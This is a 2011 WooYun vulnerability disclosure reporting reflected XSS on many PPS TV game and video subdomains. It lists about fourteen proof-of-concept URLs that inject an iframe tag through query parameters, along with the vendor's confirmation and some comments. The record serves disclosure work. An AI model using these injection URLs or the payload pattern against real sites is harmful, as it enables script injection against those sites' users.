当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03014

漏洞标题:PPS网络电视N多XSS站

相关厂商:PPS网络电视

漏洞作者: lotte

提交时间:2011-10-16 10:27

修复时间:2011-11-15 10:28

公开时间:2011-11-15 10:28

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-10-16: 细节已通知厂商并且等待厂商处理中
2011-10-16: 厂商已经确认,细节仅向厂商公开
2011-10-26: 细节向核心白帽子及相关领域专家公开
2011-11-05: 细节向普通白帽子公开
2011-11-15: 细节向实习白帽子公开
2011-11-15: 细节向公众公开

简要描述:

可执行恶意代码,挂马盗号蠕虫病毒攻击!!!

详细说明:

可执行恶意代码,挂马盗号蠕虫病毒攻击!!!

漏洞证明:

IE9
神魔遮天 http://game.pps.tv/register.php?game_id=176&gtype=3760&cf=wwwuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
凡人修真 http://game.pps.tv/load/frxz_login.php?url=http://togame.pps.tv/togame_frxz.php?type=1833uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
水浒传 http://game.pps.tv/shuihuzhuan_reg_load.php?cf=test&uid=1uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
网页游戏大全 http://game.pps.tv/login_new.php?preurl=http%3A%2F%2Ftogame.pps.tv%2Ftogame_smzt.php%3Ftype%3D3760uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
洪荒神话 http://game.pps.tv/load/game_login.php?url=http://togame.pps.tv/togame_hhsh.php?type=2869&game_id=158uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
http://game.pps.tv/chengjisihan_login.php?NextUrl=http://ly.reg.70yx.com/Index.aspxuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
搜索_PPS网络电视http://post.gameguide.youxi.pps.tv/index.php?c=outer_hall&m=outer_search_error&keyword=uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
过滤不严格 http://v.pps.tv/ugc/list.php?classid=30&order=addtime&time=weekuid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
PPS团购 http://tuan.pps.tv/index.php?c=tuangou&m=index&cat_id=1uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
天地英雄 http://game.pps.tv/load/tdyx_login.php?url=http://togame.pps.tv/togame_tdyx.php?type=2664uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
明朝时代 http://game.pps.tv/load/mcsd_login.php?url=http://togame.pps.tv/togame_mcsd.php?type=671uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
千军破 http://game.pps.tv/load/qjp_login.php?url=http://togame.pps.tv/togame_qjp.php?type=2558uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
斗法休闲 http://game.pps.tv/load/dfxxz_login.php?url=http://togame.pps.tv/togame_dfxx.php?type=2411uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E
食神小当家 http://game.pps.tv/load/ssxdj_login.php?url=http://togame.pps.tv/togame_xdj.php?type=2303uid=%22%3E%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E

修复方案:

版权声明:转载请注明来源 lotte@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2011-10-16 10:53

厂商回复:

感谢lotte,请发邮件注明详细地址GY@PPSTREAM.COM,赠送pps抱枕一个。

最新状态:

暂无

漏洞评价:

评论

  1. 2011-10-16 11:33 | lotte ( 实习白帽子 | Rank:82 漏洞数:11 )

    邮件发送了!!!

  2. 2011-10-16 21:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

  3. 2011-10-20 11:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    哈哈。这个有味道。